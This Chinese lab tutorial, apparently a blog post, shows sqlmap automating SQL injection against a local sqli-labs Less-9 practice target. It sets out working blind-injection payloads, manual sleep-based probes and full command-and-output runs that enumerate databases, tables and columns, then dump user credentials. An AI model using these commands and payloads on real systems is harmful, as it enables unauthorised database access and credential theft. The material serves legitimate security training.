目录
1 前言
由于手动注入、半自动化注入效率较低,对于一些常规的、重复性的可以交由神奇sqlmap来完成。本节课从一个最基础的注入来简单介绍sqlmap工具。
2 自动化注入案例—以sqli-labs-less9为例
2.1 实验平台
(1)靶机:——虚拟机(IP为172.16.1.1):本节实验靶场是在win2008系统上基于phpstudy搭建的一个sqli-labs漏洞靶场,win2008及phpstudy的安装过程可以参考《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,sqli-labs漏洞靶场的搭建可以参考《【环境搭建】基于WAMP环境的sqli-labs漏洞靶场的搭建》
。
(2)注入机:Kali系统,本实验利用kali自带的sqlmap来实现自动化注入。
(3)靶机与攻击机桥接到同一局域网中。
2.2 注入前准备
(1)打开靶机虚拟机,并打开phpstudy,并启动。
(2)打开kali系统,并打开sqlmap。打开kali系统,点击菜单搜索sql,点击sqlmap,打开界面如下。
(3)kali虚拟机上打开火狐浏览器,并使用火狐浏览器的访问靶机sqli-labs的Less9,打开页面如下。
2.3 判断注入点及注入类型
2.3.1 自动判断注入点及注入类型
(1)登录root用户。在kali终端,为保险起见输入命令sudo -i,登录root账户进行实验。
(2)判断注入点、注入参数的数据类型、注入类型及payload。在输入命令 sqlmap -u "http://172.16.1.1/sqli-labs/Less-9/?id=1" 对目标网站的参数是否能注入以及注入类型进行判断,代码执行过程如下
──(root💀kali)-[~]
└─# sqlmap -u "http://172.16.1.1/sqli-labs/Less-9/?id=1"
___
__H__
___ ___["]_____ ___ ___ {1.6.3#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:21:02 /2022-05-12/
[04:21:03] [INFO] testing connection to the target URL
[04:21:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[04:21:05] [INFO] testing if the target URL content is stable
[04:21:06] [INFO] target URL content is stable
[04:21:06] [INFO] testing if GET parameter 'id' is dynamic
[04:21:08] [INFO] GET parameter 'id' appears to be dynamic
[04:21:11] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[04:21:12] [INFO] testing for SQL injection on GET parameter 'id'
[04:21:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:21:23] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[04:21:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[04:22:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:22:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:22:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:22:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:22:20] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[04:22:21] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[04:22:22] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:22:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:22:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:22:25] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:22:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:22:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:22:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:22:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:22:30] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:22:31] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:22:32] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:22:34] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:22:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:22:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:22:35] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[04:22:35] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:22:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:22:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:22:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:22:35] [INFO] testing 'Generic inline queries'
[04:22:36] [INFO] testing 'MySQL inline queries'
[04:22:37] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[04:22:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[04:22:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[04:22:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[04:22:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[04:22:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[04:22:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:22:57] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[04:22:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:22:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:22:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[04:23:03] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
[04:24:15] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[04:24:15] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:25:03] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[04:25:24] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:25:57] [INFO] testing 'MySQL UNION query (89) - 1 to 20 columns'
[04:26:30] [INFO] testing 'MySQL UNION query (89) - 21 to 40 columns'
[04:26:51] [INFO] testing 'MySQL UNION query (89) - 41 to 60 columns'
[04:27:11] [INFO] testing 'MySQL UNION query (89) - 61 to 80 columns'
[04:27:32] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'
[04:27:53] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if n
sqlmap identified the following injection point(s) with a total of 273 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5552=5552 AND 'rNAt'='rNAt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3595 FROM (SELECT(SLEEP(5)))zQSk) AND 'wNtt'='wNtt
---
[04:28:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[04:28:30] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.1.1'
[*] ending @ 04:28:30 /2022-05-12/
2.3.2 手动判断注入点及注入点类型
该案例的手动判断注入点及注入类型具有典型的代表性,为了便于加深对注入点判断的理解,此处补充了手动判断的过程。
(1)判断页面是否回显数据库信息。在浏览器搜索栏URL后面输入参数?id=1,仅有一句you are in没有显示其他具体信息。修改为?id=2,也是同样结果。网页没有随id变化而动态显示不同的内容,所以无法使用union联合查询的注入手法。
(2)判断是否有报错提示,及注入数据类型及闭合方式。
-
1)修改参数为
?id=1',网页显示正常。<fontcolor=Blue>无法判断是数值型注入还是字符型注入,也无法使用报错注入手法。
-
2)修改参数为
?id=1",网页显示正常。说明双引号必定不是闭合方式
由上两小步可知没有报错提示,且无法判断注入数据类型及闭合方式。
(3)判断是否有布尔类型状态,及注入数据类型及闭合方式。结合上述步骤1和2,无法使用union联合查询注入和报错注入,因此需要继续判断是否有布尔类型状态。
-
1)假设注入数据类型为数值型。修改参数为①
?id=1 and 1=1;②?id=1 and 1=2,网页均显示正常。
-
2)假设注入数据类型为字符型且为单引号闭合。修改参数为①
?id=1' and 1=1 and '1'='1;②?id=1' and 1=2 and '1'='1,网页均显示正常。
-
3)假设注入数据类型为字符型且为双引号闭合。修改参数为①
?id=1" and 1=1 and "1"="1;②?id=1" and 1=1 and "1"="1,网页均显示正常。
由上三小步可知没有布尔类型状态,且无法判断注入数据类型及闭合方式。
(4)判断是否有延时,及注入数据类型及闭合方式。结合上述步骤1、2和3,无法使用union联合查询注入、报错注入、布尔盲注,因此需要继续判断是否有延时。
- 1)假设注入数据类型为数值型。修改参数为①
?id=1 and sleep(5)网页没有延时。
- 2)注入数据类型为字符型且为单引号闭合。修改参数为①
?id=1' and sleep(5) and '1'='1网页有延时,假设成立。
- 3)注入数据类型为字符型且为双引号闭合。修改参数为①
?id=1" and sleep(5) and "1"="1网页没有延时,假设不成立。
综上所述,注入点为字符型注入,闭合方式为’,采用延时注入。
2.4 爆库名
当确定网站存在注入之后,可以开始获取当前站点后台所有数据库。命令如下:
- 命令格式:
sqlmap -u 注入点URL --dbs,获取当前站点后台所有数据库。 - 命令格式:
sqlmap -u 注入点URL --current-db,获取当前站点所在数据库
在上一步确认该网站及参数存在注入后,使用命令sqlmap -u "http://172.16.1.1/sqli-labs/Less-9/?id=1" --dbs来爆出该网站后台所有数据库,使用命令sqlmap -u "http://172.16.1.1/sqli-labs/Less-9/?id=1"--current-db,通过程序反馈结果,我们知道后台共有5个数据库,当前数据库为’security’。
┌──(root💀kali)-[~]
└─# sqlmap -u "http://172.16.1.1/sqli-labs/Less-9/?id=1" --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.6.3#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:36:07 /2022-05-12/
[04:36:07] [INFO] resuming back-end DBMS 'mysql'
[04:36:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5552=5552 AND 'rNAt'='rNAt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3595 FROM (SELECT(SLEEP(5)))zQSk) AND 'wNtt'='wNtt
---
[04:36:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[04:36:08] [INFO] fetching database names
[04:36:08] [INFO] fetching number of databases
[04:36:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:36:08] [INFO] retrieved: 8
[04:36:16] [INFO] retrieved: information_schema
[04:38:14] [INFO] retrieved: challenges
[04:39:20] [INFO] retrieved: groupbytest
[04:40:32] [INFO] retrieved: jrlt
[04:41:01] [INFO] retrieved: mysql
[04:41:36] [INFO] retrieved: performance_schema
[04:43:35] [INFO] retrieved: security
[04:44:28] [INFO] retrieved: test
available databases [8]:
[*] challenges
[*] groupbytest
[*] information_schema
[*] jrlt
[*] mysql
[*] performance_schema
[*] security
[*] test
[04:44:57] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.1.1'
[*] ending @ 04:44:57 /2022-05-12/
┌──(root💀kali)-[~]
└─# sqlmap -u "http://172.16.1.1/sqli-labs/Less-9/?id=1" --current-db
___
__H__
___ ___["]_____ ___ ___ {1.6.3#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:50:37 /2022-05-12/
[04:50:37] [INFO] resuming back-end DBMS 'mysql'
[04:50:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5552=5552 AND 'rNAt'='rNAt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3595 FROM (SELECT(SLEEP(5)))zQSk) AND 'wNtt'='wNtt
---
[04:50:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[04:50:38] [INFO] fetching current database
[04:50:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:50:38] [INFO] retrieved: security
current database: 'security'
[04:51:32] [INFO] fetched data logged to text files undr '/root/.local/share/sqlmap/output/172.16.1.1'
[*] ending @ 04:51:32 /2022-05-12/
2.5 爆表名
当查询完数据库之后,可以指定数据库查询数据库下的所有表名,如果没有指定,则会对所有数据库下的所有表名进行查询,命令格式如下:
- 命令格式:
sqlmap -u 注入点URL -D 目标数据库 --tables。
在上一步我们确定当前数据库为’security’,使用命令sqlmap -u “http://172.16.1.1/sqli-labs/Less-9/?id=1” -D ‘security’ --tables来获取当前数据库下有哪些表。程序运行结果如下,共有4个表,其中表格users是下一步的目标。
┌──(root💀kali)-[~]
└─# sqlmap -u “http://172.16.1.1/sqli-labs/Less-9/?id=1” -D ‘security’ --tables
___
__H__
___ ___[']_____ ___ ___ {1.6.3#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:56:30 /2022-05-12/
[04:56:30] [INFO] resuming back-end DBMS 'mysql'
[04:56:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5552=5552 AND 'rNAt'='rNAt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3595 FROM (SELECT(SLEEP(5)))zQSk) AND 'wNtt'='wNtt
---
[04:56:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0.12
[04:56:31] [INFO] fetching tables for database: 'security'
[04:56:31] [INFO] fetching number of tables for database 'security'
[04:56:31] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:56:31] [INFO] retrieved: 4
[04:56:37] [INFO] retrieved: emails
[04:57:18] [INFO] retrieved: referers
[04:58:13] [INFO] retrieved: uagents
[04:59:01] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[04:59:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.1.1'
[*] ending @ 04:59:31 /2022-05-12/
2.6 爆字段名
当查询完表名后,可以继续查询表中所有字段名。命令格式如下:
- 命令格式:
sqlmap -u 注入点URL -D 目标数据库 -T 目标数据表 --columns。
在获取了数据库名和表名后,我们可以使用命令sqlmap -u “http://172.16.1.1/sqli-labs/Less-9/?id=1” -D ‘security’ -T ‘users’ --columns来获取目标表格下有哪些字段。可见共有三个字段,依次是id、username、password。
┌──(root💀kali)-[~]
└─# sqlmap -u “http://172.16.1.1/sqli-labs/Less-9/?id=1” -D ‘security’ -T ‘users’ --columns
___
__H__
___ ___["]_____ ___ ___ {1.6.3#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:00:55 /2022-05-12/
[05:00:55] [INFO] resuming back-end DBMS 'mysql'
[05:00:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5552=5552 AND 'rNAt'='rNAt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3595 FROM (SELECT(SLEEP(5)))zQSk) AND 'wNtt'='wNtt
---
[05:00:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[05:00:56] [INFO] fetching columns for table 'users' in database 'security'
[05:00:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:00:57] [INFO] retrieved: 3
[05:01:04] [INFO] retrieved: id
[05:01:20] [INFO] retrieved: int(3)
[05:02:07] [INFO] retrieved: username
[05:03:01] [INFO] retrieved: varchar(20)
[05:04:19] [INFO] retrieved: password
[05:05:13] [INFO] retrieved: varchar(20)
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[05:06:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.1.1'
[*] ending @ 05:06:32 /2022-05-12/
2.7 爆字段内容
当查询字段名后,可继续获取字段中具体的数据信息。命令格式如下:
命令格式:sqlmap -u 注入点URL -D 目标数据库 -T 目标数据表 -C 目标字段 --dump。当有多个目标字段需要查询时,使用英文格式逗号隔开。
在上述步骤后,我们使用命令sqlmap -u “http://172.16.1.1/sqli-labs/Less-9/?id=1” -D ‘security’ -T ‘users’ -C 'id,username,password' --dump获取所有账号及密码,如下,共有15个,整整齐齐。
──(root💀kali)-[~]
└─# sqlmap -u “http://172.16.1.1/sqli-labs/Less-9/?id=1” -D ‘security’ -T ‘users’ -C 'id,username,password' --dump
___
__H__
___ ___[,]_____ ___ ___ {1.6.3#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:09:23 /2022-05-12/
[05:09:23] [INFO] resuming back-end DBMS 'mysql'
[05:09:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5552=5552 AND 'rNAt'='rNAt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3595 FROM (SELECT(SLEEP(5)))zQSk) AND 'wNtt'='wNtt
---
[05:09:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0.12
[05:09:25] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'security'
[05:09:25] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'security'
[05:09:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:09:25] [INFO] retrieved: 14
[05:09:37] [INFO] retrieved: 1
[05:09:46] [INFO] retrieved: Dumb
[05:10:16] [INFO] retrieved: Dumb
[05:10:46] [INFO] retrieved: 2
[05:10:56] [INFO] retrieved: I-kill-you
[05:12:08] [INFO] retrieved: Angelina
[05:13:02] [INFO] retrieved: 3
[05:13:11] [INFO] retrieved: p@ssword
[05:14:07] [INFO] retrieved: Dummy
[05:14:43] [INFO] retrieved: 4
[05:14:52] [INFO] retrieved: crappy
[05:15:33] [INFO] retrieved: secure
[05:16:15] [INFO] retrieved: 5
[05:16:24] [INFO] retrieved: stupidity
[05:17:24] [INFO] retrieved: stupid
[05:18:05] [INFO] retrieved: 6
[05:18:14] [INFO] retrieved: genious
[05:19:01] [INFO] retrieved: superman
[05:19:55] [INFO] retrieved: 7
[05:20:04] [INFO] retrieved: mob!le
[05:20:50] [INFO] retrieved: batman
[05:21:31] [INFO] retrieved: 8
[05:21:40] [INFO] retrieved: 654321
[05:22:28] [INFO] retrieved: admin
[05:23:03] [INFO] retrieved: 9
[05:23:12] [INFO] retrieved: admin1
[05:23:53] [INFO] retrieved: admin1
[05:24:34] [INFO] retrieved: 10
[05:24:51] [INFO] retrieved: admin2
[05:25:33] [INFO] retrieved: admin2
[05:26:15] [INFO] retrieved: 11
[05:26:31] [INFO] retrieved: admin3
[05:27:14] [INFO] retrieved: admin3
[05:27:56] [INFO] retrieved: 12
[05:28:12] [INFO] retrieved: dumbo
[05:28:47] [INFO] retrieved: dhakkan
[05:29:34] [INFO] retrieved: 14
[05:29:52] [INFO] retrieved: admin4
[05:30:33] [INFO] retrieved: admin4
[05:31:14] [INFO] retrieved: 15
[05:31:31] [INFO] retrieved: 123456
[05:32:18] [INFO] retrieved: admin'#
Database: security
Table: users
[14 entries]
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 654321 |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 15 | admin'# | 123456 |
+----+----------+------------+
[05:33:10] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.1.1/dump/security/users.csv'
[05:33:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.1.1'
[*] ending @ 05:33:09 /2022-05-12/
3 批量爆破
SQLMap支持从不同类型的文件中读取请求进行SQL注入探测,这些包含请求的文件可以有BurpSuite截获生成。SQLMap通过设置不同参数来读取不同类型的文件,如:
- -l:从BurpSuite Proxy或WebScarab Proxy中读取http请求日志文件;
- -x:从sitemap.xml站点地图文件中读取目标探测;
- -m:从多行文本格式的文件中读取多个目标,对多个目标进行探测;
- -r:从文本文件中读取http请求作为SQL注入探测的目标;
- -c:从配置文件sqlmap.conf中读取目标探测。
3821
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
